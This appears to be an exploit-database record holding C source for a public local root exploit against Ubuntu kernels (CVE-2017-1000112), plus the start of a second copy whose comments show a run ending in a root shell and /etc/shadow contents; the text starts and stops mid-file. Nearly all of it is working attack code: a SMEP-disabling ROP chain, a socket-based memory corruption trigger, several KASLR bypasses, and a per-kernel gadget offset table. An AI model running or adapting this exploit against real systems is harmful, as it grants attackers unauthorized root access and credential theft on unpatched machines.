XCHG_EAX_EDI_RET;\t\t\\\n\t*stack++ = MOV_CR4_RDI_RET;\n\n#define CHAIN_JMP_PAYLOAD \\\n\t*stack++ = POP_RCX_RET; \\\n\t*stack++ = (uint64_t)&payload; \\\n\t*stack++ = JMP_RCX;\n\nvoid mmap_stack() {\n\tuint64_t stack_aligned, stack_addr;\n\tint page_size, stack_size, stack_offset;\n\tuint64_t* stack;\n\n\tpage_size = getpagesize();\n\n\tstack_aligned = (XCHG_EAX_ESP_RET & 0x00000000fffffffful) & ~(page_size - 1);\n\tstack_addr = stack_aligned - page_size * 4;\n\tstack_size = page_size * 8;\n\tstack_offset = XCHG_EAX_ESP_RET % page_size;\n\n\tstack = mmap((void*)stack_addr, stack_size, PROT_READ | PROT_WRITE,\n\t\t\tMAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);\n\tif (stack == MAP_FAILED || stack != (void*)stack_addr) {\n\t\tdprintf(\"[-] mmap()\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tstack = (uint64_t*)((char*)stack_aligned + stack_offset);\n\n\tCHAIN_SAVE_ESP;\n\tCHAIN_DISABLE_SMEP;\n\tCHAIN_JMP_PAYLOAD;\n}\n\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\n\nstruct ubuf_info {\n\tuint64_t callback;\t// void (*callback)(struct ubuf_info *, bool)\n\tuint64_t ctx;\t\t// void *\n\tuint64_t desc;\t\t// unsigned long\n};\n\nstruct skb_shared_info {\n\tuint8_t nr_frags;\t// unsigned char\n\tuint8_t tx_flags;\t// __u8\n\tuint16_t gso_size;\t// unsigned short\n\tuint16_t gso_segs;\t// unsigned short\n\tuint16_t gso_type;\t// unsigned short\n\tuint64_t frag_list;\t// struct sk_buff *\n\tuint64_t hwtstamps;\t// struct skb_shared_hwtstamps\n\tuint32_t tskey;\t\t// u32\n\tuint32_t ip6_frag_id;\t// __be32\n\tuint32_t dataref;\t// atomic_t\n\tuint64_t destructor_arg; // void *\n\tuint8_t frags[16][17];\t// skb_frag_t frags[MAX_SKB_FRAGS];\n};\n\nstruct ubuf_info ui;\n\nvoid init_skb_buffer(char* buffer, unsigned long func) {\n\tstruct skb_shared_info* ssi = (struct skb_shared_info*)buffer;\n\tmemset(ssi, 0, sizeof(*ssi));\n\n\tssi->tx_flags = 0xff;\n\tssi->destructor_arg = (uint64_t)&ui;\n\tssi->nr_frags = 0;\n\tssi->frag_list = 0;\n\n\tui.callback = func;\n}\n\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\n\n#define SHINFO_OFFSET 3164\n\nvoid oob_execute(unsigned long payload) {\n\tchar buffer[4096];\n\tmemset(&buffer[0], 0x42, 4096);\n\tinit_skb_buffer(&buffer[SHINFO_OFFSET], payload);\n\n\tint s = socket(PF_INET, SOCK_DGRAM, 0);\n\tif (s == -1) {\n\t\tdprintf(\"[-] socket()\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tstruct sockaddr_in addr;\n\tmemset(&addr, 0, sizeof(addr));\n\taddr.sin_family = AF_INET;\n\taddr.sin_port = htons(8000);\n\taddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\n\n\tif (connect(s, (void*)&addr, sizeof(addr))) {\n\t\tdprintf(\"[-] connect()\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tint size = SHINFO_OFFSET + sizeof(struct skb_shared_info);\n\tint rv = send(s, buffer, size, MSG_MORE);\n\tif (rv != size) {\n\t\tdprintf(\"[-] send()\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tint val = 1;\n\trv = setsockopt(s, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));\n\tif (rv != 0) {\n\t\tdprintf(\"[-] setsockopt(SO_NO_CHECK)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tsend(s, buffer, 1, 0);\n\n\tclose(s);\n}\n\n// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *\n\n#define CHUNK_SIZE 1024\n\nint read_file(const char* file, char* buffer, int max_length) {\n\tint f = open(file, O_RDONLY);\n\tif (f == -1)\n\t\treturn -1;\n\tint bytes_read = 0;\n\twhile (true) {\n\t\tint bytes_to_read = CHUNK_SIZE;\n\t\tif (bytes_to_read > max_length - bytes_read)\n\t\t\tbytes_to_read = max_length - bytes_read;\n\t\tint rv = read(f, &buffer[bytes_read], bytes_to_read);\n\t\tif (rv == -1)\n\t\t\treturn -1;\n\t\tbytes_read += rv;\n\t\tif (rv == 0)\n\t\t\treturn bytes_read;\n\t}\n}\n\n#define LSB_RELEASE_LENGTH 1024\n\nvoid get_distro_codename(char* output, int max_length) {\n\tchar buffer[LSB_RELEASE_LENGTH];\n\tchar* path = \"/etc/lsb-release\";\n\tint length = read_file(path, &buffer[0], LSB_RELEASE_LENGTH);\n\tif (length == -1) {\n dprintf(\"[-] open/read(%s)\\n\", path);\n exit(EXIT_FAILURE);\n\t}\n\tconst char *needle = \"DISTRIB_CODENAME=\";\n\tint needle_length = strlen(needle);\n\tchar* found = memmem(&buffer[0], length, needle, needle_length);\n\tif (found == NULL) {\n\t\tdprintf(\"[-] couldn't find DISTRIB_CODENAME in /etc/lsb-release\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tint i;\n\tfor (i = 0; found[needle_length + i] != '\\n'; i++) {\n\t\tif (i >= max_length) {\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t\tif ((found - &buffer[0]) + needle_length + i >= length) {\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t\toutput[i] = found[needle_length + i];\n\t}\n}\n\nstruct utsname get_kernel_version() {\n\tstruct utsname u;\n\tint rv = uname(&u);\n\tif (rv != 0) {\n\t\tdprintf(\"[-] uname()\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\treturn u;\n}\n\n#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))\n\n#define DISTRO_CODENAME_LENGTH 32\n\nvoid detect_kernel() {\n\tchar codename[DISTRO_CODENAME_LENGTH];\n\tstruct utsname u;\n\n\tu = get_kernel_version();\n\n\tif (strstr(u.machine, \"64\") == NULL) {\n\t\tdprintf(\"[-] system is not using a 64-bit kernel\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (strstr(u.version, \"-Ubuntu\") == NULL) {\n\t\tdprintf(\"[-] system is not using an Ubuntu kernel\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (strstr(u.version, \"14.04.1\")) {\n\t\tstrcpy(&codename[0], \"trusty\");\n\t} else if (strstr(u.version, \"16.04.1\")) {\n\t\tstrcpy(&codename[0], \"xenial\");\n\t} else {\n\t\tget_distro_codename(&codename[0], DISTRO_CODENAME_LENGTH);\n\n\t\t// Linux Mint kernel release mappings\n\t\tif (!strcmp(&codename[0], \"qiana\"))\n\t\t\tstrcpy(&codename[0], \"trusty\");\n\t\tif (!strcmp(&codename[0], \"rebecca\"))\n\t\t\tstrcpy(&codename[0], \"trusty\");\n\t\tif (!strcmp(&codename[0], \"rafaela\"))\n\t\t\tstrcpy(&codename[0], \"trusty\");\n\t\tif (!strcmp(&codename[0], \"rosa\"))\n\t\t\tstrcpy(&codename[0], \"trusty\");\n\t\tif (!strcmp(&codename[0], \"sarah\"))\n\t\t\tstrcpy(&codename[0], \"xenial\");\n\t\tif (!strcmp(&codename[0], \"serena\"))\n\t\t\tstrcpy(&codename[0], \"xenial\");\n\t\tif (!strcmp(&codename[0], \"sonya\"))\n\t\t\tstrcpy(&codename[0], \"xenial\");\n\t}\n\n\tint i;\n\tfor (i = 0; i < ARRAY_SIZE(kernels); i++) {\n\t\tif (strcmp(&codename[0], kernels[i].distro) == 0 &&\n\t\t strcmp(u.release, kernels[i].version) == 0) {\n\t\t\tdprintf(\"[.] kernel version '%s' detected\\n\", kernels[i].version);\n\t\t\tkernel = i;\n\t\t\treturn;\n\t\t}\n\t}\n\n\tdprintf(\"[-] kernel version not recognized\\n\");\n\texit(EXIT_FAILURE);\n}\n\n#define PROC_CPUINFO_LENGTH 4096\n\n// 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP\nint smap_smep_enabled() {\n\tchar buffer[PROC_CPUINFO_LENGTH];\n\tchar* path = \"/proc/cpuinfo\";\n\tint length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);\n\tif (length == -1) {\n\t\tdprintf(\"[-] open/read(%s)\\n\", path);\n\t\texit(EXIT_FAILURE);\n\t}\n\tint rv = 0;\n\tchar* found = memmem(&buffer[0], length, \"smep\", 4);\n\tif (found != NULL)\n\t\trv += 1;\n\tfound = memmem(&buffer[0], length, \"smap\", 4);\n\tif (found != NULL)\n\t\trv += 2;\n\treturn rv;\n}\n\nvoid check_smep_smap() {\n\tint rv = smap_smep_enabled();\n\tif (rv >= 2) {\n\t\tdprintf(\"[-] SMAP detected, no bypass available\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n#if !ENABLE_SMEP_BYPASS\n\tif (rv >= 1) {\n\t\tdprintf(\"[-] SMEP detected, use ENABLE_SMEP_BYPASS\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n#endif\n}\n\n// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *\n\n#define SYSLOG_ACTION_READ_ALL 3\n#define SYSLOG_ACTION_SIZE_BUFFER 10\n\nbool mmap_syslog(char** buffer, int* size) {\n\t*size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);\n\tif (*size == -1) {\n\t\tdprintf(\"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\\n\");\n\t\treturn false;\n\t}\n\n\t*size = (*size / getpagesize() + 1) * getpagesize();\n\t*buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,\n\t\t\t\t MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n\n\t*size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);\n\tif (*size == -1) {\n\t\tdprintf(\"[-] klogctl(SYSLOG_ACTION_READ_ALL)\\n\");\n\t\treturn false;\n\t}\n\n\treturn true;\n}\n\nunsigned long get_kernel_addr_trusty(char* buffer, int size) {\n\tconst char* needle1 = \"Freeing unused\";\n\tchar* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\n\tif (substr == NULL) return 0;\n\n\tint start = 0;\n\tint end = 0;\n\tfor (end = start; substr[end] != '-'; end++);\n\n\tconst char* needle2 = \"ffffff\";\n\tsubstr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\n\tif (substr == NULL) return 0;\n\n\tchar* endptr = &substr[16];\n\tunsigned long r = strtoul(&substr[0], &endptr, 16);\n\n\tr &= 0xffffffffff000000ul;\n\n\treturn r;\n}\n\nunsigned long get_kernel_addr_xenial(char* buffer, int size) {\n\tconst char* needle1 = \"Freeing unused\";\n\tchar* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\n\tif (substr == NULL) {\n\t\treturn 0;\n\t}\n\n\tint start = 0;\n\tint end = 0;\n\tfor (start = 0; substr[start] != '-'; start++);\n\tfor (end = start; substr[end] != '\\n'; end++);\n\n\tconst char* needle2 = \"ffffff\";\n\tsubstr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\n\tif (substr == NULL) {\n\t\treturn 0;\n\t}\n\n\tchar* endptr = &substr[16];\n\tunsigned long r = strtoul(&substr[0], &endptr, 16);\n\n\tr &= 0xfffffffffff00000ul;\n\tr -= 0x1000000ul;\n\n\treturn r;\n}\n\nunsigned long get_kernel_addr_syslog() {\n\tunsigned long addr = 0;\n\tchar* syslog;\n\tint size;\n\n\tdprintf(\"[.] trying syslog...\\n\");\n\n\tif (!mmap_syslog(&syslog, &size))\n\t\treturn 0;\n\n\tif (strcmp(\"trusty\", kernels[kernel].distro) == 0)\n\t\taddr = get_kernel_addr_trusty(syslog, size);\n\tif (strcmp(\"xenial\", kernels[kernel].distro) == 0)\n\t\taddr = get_kernel_addr_xenial(syslog, size);\n\n\tif (!addr)\n\t\tdprintf(\"[-] kernel base not found in syslog\\n\");\n\n\treturn addr;\n}\n\n// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *\n\nunsigned long get_kernel_addr_kallsyms() {\n\tFILE *f;\n\tunsigned long addr = 0;\n\tchar dummy;\n\tchar sname[256];\n\tchar* name = \"startup_64\";\n\tchar* path = \"/proc/kallsyms\";\n\n\tdprintf(\"[.] trying %s...\\n\", path);\n\tf = fopen(path, \"r\");\n\tif (f == NULL) {\n\t\tdprintf(\"[-] open/read(%s)\\n\", path);\n\t\treturn 0;\n\t}\n\n\tint ret = 0;\n\twhile (ret != EOF) {\n\t\tret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\n\t\tif (ret == 0) {\n\t\t\tfscanf(f, \"%s\\n\", sname);\n\t\t\tcontinue;\n\t\t}\n\t\tif (!strcmp(name, sname)) {\n\t\t\tfclose(f);\n\t\t\treturn addr;\n\t\t}\n\t}\n\n\tfclose(f);\n\tdprintf(\"[-] kernel base not found in %s\\n\", path);\n\treturn 0;\n}\n\n// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *\n\nunsigned long get_kernel_addr_sysmap() {\n\tFILE *f;\n\tunsigned long addr = 0;\n\tchar path[512] = \"/boot/System.map-\";\n\tchar version[32];\n\n\tstruct utsname u;\n\tu = get_kernel_version();\n\tstrcat(path, u.release);\n\tdprintf(\"[.] trying %s...\\n\", path);\n\tf = fopen(path, \"r\");\n\tif (f == NULL) {\n\t\tdprintf(\"[-] open/read(%s)\\n\", path);\n\t\treturn 0;\n\t}\n\n\tchar dummy;\n\tchar sname[256];\n\tchar* name = \"startup_64\";\n\tint ret = 0;\n\twhile (ret != EOF) {\n\t\tret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\n\t\tif (ret == 0) {\n\t\t\tfscanf(f, \"%s\\n\", sname);\n\t\t\tcontinue;\n\t\t}\n\t\tif (!strcmp(name, sname)) {\n\t\t\tfclose(f);\n\t\t\treturn addr;\n\t\t}\n\t}\n\n\tfclose(f);\n\tdprintf(\"[-] kernel base not found in %s\\n\", path);\n\treturn 0;\n}\n\n// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *\n\nunsigned long get_kernel_addr_mincore() {\n\tunsigned char buf[getpagesize()/sizeof(unsigned char)];\n\tunsigned long iterations = 20000000;\n\tunsigned long addr = 0;\n\n\tdprintf(\"[.] trying mincore info leak...\\n\");\n\t/* A MAP_ANONYMOUS | MAP_HUGETLB mapping */\n\tif (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,\n\t\tMAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {\n\t\tdprintf(\"[-] mmap()\\n\");\n\t\treturn 0;\n\t}\n\n\tint i;\n\tfor (i = 0; i <= iterations; i++) {\n\t\t/* Touch a mishandle with this type mapping */\n\t\tif (mincore((void*)0x86000000, 0x1000000, buf)) {\n\t\t\tdprintf(\"[-] mincore()\\n\");\n\t\t\treturn 0;\n\t\t}\n\n\t\tint n;\n\t\tfor (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {\n\t\t\taddr = *(unsigned long*)(&buf[n]);\n\t\t\t/* Kernel address space */\n\t\t\tif (addr > 0xffffffff00000000) {\n\t\t\t\taddr &= 0xffffffffff000000ul;\n\t\t\t\tif (munmap((void*)0x66000000, 0x20000000000))\n\t\t\t\t\tdprintf(\"[-] munmap()\\n\");\n\t\t\t\treturn addr;\n\t\t\t}\n\t\t}\n\t}\n\n\tif (munmap((void*)0x66000000, 0x20000000000))\n\t\tdprintf(\"[-] munmap()\\n\");\n\n\tdprintf(\"[-] kernel base not found in mincore info leak\\n\");\n\treturn 0;\n}\n\n// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *\n\nunsigned long get_kernel_addr() {\n\tunsigned long addr = 0;\n\n\taddr = get_kernel_addr_kallsyms();\n\tif (addr) return addr;\n\n\taddr = get_kernel_addr_sysmap();\n\tif (addr) return addr;\n\n\taddr = get_kernel_addr_syslog();\n\tif (addr) return addr;\n\n\taddr = get_kernel_addr_mincore();\n\tif (addr) return addr;\n\n\tdprintf(\"[-] KASLR bypass failed\\n\");\n\texit(EXIT_FAILURE);\n\n\treturn 0;\n}\n\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\n\nstatic bool write_file(const char* file, const char* what, ...) {\n\tchar buf[1024];\n\tva_list args;\n\tva_start(args, what);\n\tvsnprintf(buf, sizeof(buf), what, args);\n\tva_end(args);\n\tbuf[sizeof(buf) - 1] = 0;\n\tint len = strlen(buf);\n\n\tint fd = open(file, O_WRONLY | O_CLOEXEC);\n\tif (fd == -1)\n\t\treturn false;\n\tif (write(fd, buf, len) != len) {\n\t\tclose(fd);\n\t\treturn false;\n\t}\n\tclose(fd);\n\treturn true;\n}\n\nvoid setup_sandbox() {\n\tint real_uid = getuid();\n\tint real_gid = getgid();\n\n\tif (unshare(CLONE_NEWUSER) != 0) {\n\t\tdprintf(\"[!] unprivileged user namespaces are not available\\n\");\n\t\tdprintf(\"[-] unshare(CLONE_NEWUSER)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (unshare(CLONE_NEWNET) != 0) {\n\t\tdprintf(\"[-] unshare(CLONE_NEWUSER)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (!write_file(\"/proc/self/setgroups\", \"deny\")) {\n\t\tdprintf(\"[-] write_file(/proc/self/set_groups)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (!write_file(\"/proc/self/uid_map\", \"0 %d 1\\n\", real_uid)) {\n\t\tdprintf(\"[-] write_file(/proc/self/uid_map)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (!write_file(\"/proc/self/gid_map\", \"0 %d 1\\n\", real_gid)) {\n\t\tdprintf(\"[-] write_file(/proc/self/gid_map)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tcpu_set_t my_set;\n\tCPU_ZERO(&my_set);\n\tCPU_SET(0, &my_set);\n\tif (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {\n\t\tdprintf(\"[-] sched_setaffinity()\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (system(\"/sbin/ifconfig lo mtu 1500\") != 0) {\n\t\tdprintf(\"[-] system(/sbin/ifconfig lo mtu 1500)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (system(\"/sbin/ifconfig lo up\") != 0) {\n\t\tdprintf(\"[-] system(/sbin/ifconfig lo up)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid exec_shell() {\n\tint fd;\n\n\tfd = open(\"/proc/1/ns/net\", O_RDONLY);\n\tif (fd == -1) {\n\t\tdprintf(\"error opening /proc/1/ns/net\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (setns(fd, CLONE_NEWNET) == -1) {\n\t\tdprintf(\"error calling setns\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tsystem(SHELL);\n}\n\nbool is_root() {\n\t// We can't simple check uid, since we're running inside a namespace\n\t// with uid set to 0. Try opening /etc/shadow instead.\n\tint fd = open(\"/etc/shadow\", O_RDONLY);\n\tif (fd == -1)\n\t\treturn false;\n\tclose(fd);\n\treturn true;\n}\n\nvoid check_root() {\n\tdprintf(\"[.] checking if we got root\\n\");\n\tif (!is_root()) {\n\t\tdprintf(\"[-] something went wrong =(\\n\");\n\t\treturn;\n\t}\n\tdprintf(\"[+] got r00t ^_^\\n\");\n\texec_shell();\n}\n\nint main(int argc, char** argv) {\n\tif (argc > 1) SHELL = argv[1];\n\n\tdprintf(\"[.] starting\\n\");\n\n\tdprintf(\"[.] checking kernel version\\n\");\n\tdetect_kernel();\n\tdprintf(\"[~] done, version looks good\\n\");\n\n\tdprintf(\"[.] checking SMEP and SMAP\\n\");\n\tcheck_smep_smap();\n\tdprintf(\"[~] done, looks good\\n\");\n\n\tdprintf(\"[.] setting up namespace sandbox\\n\");\n\tsetup_sandbox();\n\tdprintf(\"[~] done, namespace sandbox set up\\n\");\n\n#if ENABLE_KASLR_BYPASS\n\tdprintf(\"[.] KASLR bypass enabled, getting kernel addr\\n\");\n\tKERNEL_BASE = get_kernel_addr();\n\tdprintf(\"[~] done, kernel addr: %lx\\n\", KERNEL_BASE);\n#endif\n\n\tdprintf(\"[.] commit_creds: %lx\\n\", COMMIT_CREDS);\n\tdprintf(\"[.] prepare_kernel_cred: %lx\\n\", PREPARE_KERNEL_CRED);\n\n\tunsigned long payload = (unsigned long)&get_root;\n\n#if ENABLE_SMEP_BYPASS\n\tdprintf(\"[.] SMEP bypass enabled, mmapping fake stack\\n\");\n\tmmap_stack();\n\tpayload = XCHG_EAX_ESP_RET;\n\tdprintf(\"[~] done, fake stack mmapped\\n\");\n#endif\n\n\tdprintf(\"[.] executing payload %lx\\n\", payload);\n\toob_execute(payload);\n\tdprintf(\"[~] done, should be root now\\n\");\n\n\tcheck_root();\n\n\treturn 0;\n}", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:26", "description": "\nLinux Kernel 4.4.0-83 4.8.0-58 (Ubuntu 14.0416.04) - Local Privilege Escalation (KASLR SMEP)", "edition": 1, "published": "2017-08-13T00:00:00", "title": "Linux Kernel 4.4.0-83 4.8.0-58 (Ubuntu 14.0416.04) - Local Privilege Escalation (KASLR SMEP)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000112"], "modified": "2017-08-13T00:00:00", "id": "EXPLOITPACK:7C26DD271630EDB66FB520C30E13D873", "href": "", "sourceData": "// A proof-of-concept local root exploit for CVE-2017-1000112.\n// Includes KASLR and SMEP bypasses. No SMAP bypass.\n// Tested on Ubuntu trusty 4.4.0-* and Ubuntu xenial 4-8-0-* kernels.\n//\n// EDB Note: Also included the work from ~ https://ricklarabee.blogspot.co.uk/2017/12/adapting-poc-for-cve-2017-1000112-to.html\n// Supports: Ubuntu Xenial (16.04) 4.4.0-81 \n//\n// Usage:\n// user@ubuntu:~$ uname -a\n// Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux\n// user@ubuntu:~$ whoami\n// user\n// user@ubuntu:~$ id\n// uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)\n// user@ubuntu:~$ gcc pwn.c -o pwn\n// user@ubuntu:~$ ./pwn \n// [.] starting\n// [.] checking distro and kernel versions\n// [.] kernel version '4.8.0-58-generic' detected\n// [~] done, versions looks good\n// [.] checking SMEP and SMAP\n// [~] done, looks good\n// [.] setting up namespace sandbox\n// [~] done, namespace sandbox set up\n// [.] KASLR bypass enabled, getting kernel addr\n// [~] done, kernel text: ffffffffae400000\n// [.] commit_creds: ffffffffae4a5d20\n// [.] prepare_kernel_cred: ffffffffae4a6110\n// [.] SMEP bypass enabled, mmapping fake stack\n// [~] done, fake stack mmapped\n// [.] executing payload ffffffffae40008d\n// [~] done, should be root now\n// [.] checking if we got root\n// [+] got r00t ^_^\n// root@ubuntu:/home/user# whoami\n// root\n// root@ubuntu:/home/user# id\n// uid=0(root) gid=0(root) groups=0(root)\n// root@ubuntu:/home/user# cat /etc/shadow\n// root:!:17246:0:99999:7:::\n// daemon:*:17212:0:99999:7:::\n// bin:*:17212:0:99999:7:::\n// sys:*:17212:0:99999:7:::\n// ...\n//\n// EDB Note: Details ~ http://www.openwall.com/lists/oss-security/2017/08/13/1\n//\n// Andrey Konovalov <andreyknvl@gmail.com>\n\n#define _GNU_SOURCE\n\n#include <assert.h>\n#include <errno.h>\n#include <fcntl.h>\n#include <sched.h>\n#include <stdarg.h>\n#include <stdbool.h>\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\n#include <linux/socket.h>\n#include <netinet/ip.h>\n#include <sys/klog.h>\n#include <sys/mman.h>\n#include <sys/utsname.h>\n\n#define ENABLE_KASLR_BYPASS\t\t1\n#define ENABLE_SMEP_BYPASS\t\t1\n\n// Will be overwritten if ENABLE_KASLR_BYPASS is enabled.\nunsigned long KERNEL_BASE =\t\t0xffffffff81000000ul;\n\n// Will be overwritten by detect_versions().\nint kernel = -1;\n\nstruct kernel_info {\n\tconst char* distro;\n\tconst char* version;\n\tuint64_t commit_creds;\n\tuint64_t prepare_kernel_cred;\n\tuint64_t xchg_eax_esp_ret;\n\tuint64_t pop_rdi_ret;\n\tuint64_t mov_dword_ptr_rdi_eax_ret;\n\tuint64_t mov_rax_cr4_ret;\n\tuint64_t neg_rax_ret;\n\tuint64_t pop_rcx_ret;\n\tuint64_t or_rax_rcx_ret;\n\tuint64_t xchg_eax_edi_ret;\n\tuint64_t mov_cr4_rdi_ret;\n\tuint64_t jmp_rcx;\n};\n\nstruct kernel_info kernels[] = {\n\t{ \"trusty\", \"4.4.0-21-generic\", 0x9d7a0, 0x9da80, 0x4520a, 0x30f75, 0x109957, 0x1a7a0, 0x3d6b7a, 0x1cbfc, 0x76453, 0x49d4d, 0x61300, 0x1b91d },\n\t{ \"trusty\", \"4.4.0-22-generic\", 0x9d7e0, 0x9dac0, 0x4521a, 0x28c19d, 0x1099b7, 0x1a7f0, 0x3d781a, 0x1cc4c, 0x764b3, 0x49d5d, 0x61300, 0x48040 },\n\t{ \"trusty\", \"4.4.0-24-generic\", 0x9d5f0, 0x9d8d0, 0x4516a, 0x1026cd, 0x107757, 0x1a810, 0x3d7a9a, 0x1cc6c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },\n\t{ \"trusty\", \"4.4.0-28-generic\", 0x9d760, 0x9da40, 0x4516a, 0x3dc58f, 0x1079a7, 0x1a830, 0x3d801a, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },\n\t{ \"trusty\", \"4.4.0-31-generic\", 0x9d760, 0x9da40, 0x4516a, 0x3e223f, 0x1079a7, 0x1a830, 0x3ddcca, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },\n\t{ \"trusty\", \"4.4.0-34-generic\", 0x9d760, 0x9da40, 0x4510a, 0x355689, 0x1079a7, 0x1a830, 0x3ddd1a, 0x1cc8c, 0x763b3, 0x49c5d, 0x612f0, 0x47f40 },\n\t{ \"trusty\", \"4.4.0-36-generic\", 0x9d770, 0x9da50, 0x4510a, 0x1eec9d, 0x107a47, 0x1a830, 0x3de02a, 0x1cc8c, 0x763c3, 0x29595, 0x61300, 0x47f40 },\n\t{ \"trusty\", \"4.4.0-38-generic\", 0x9d820, 0x9db00, 0x4510a, 0x598fd, 0x107af7, 0x1a820, 0x3de8ca, 0x1cc7c, 0x76473, 0x49c5d, 0x61300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-42-generic\", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3deb7a, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-45-generic\", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3debda, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-47-generic\", 0x9d940, 0x9dc20, 0x4511a, 0x171f8d, 0x107bd7, 0x1a820, 0x3e241a, 0x1cc7c, 0x76463, 0x299f5, 0x61300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-51-generic\", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-53-generic\", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-57-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x39401d, 0x1097d7, 0x1a820, 0x3e527a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-59-generic\", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dbc4e, 0x1097d7, 0x1a820, 0x3e571a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-62-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x3ea46f, 0x109837, 0x1a820, 0x3e5e5a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-63-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-64-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },\n\t{ \"trusty\", \"4.4.0-66-generic\", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b 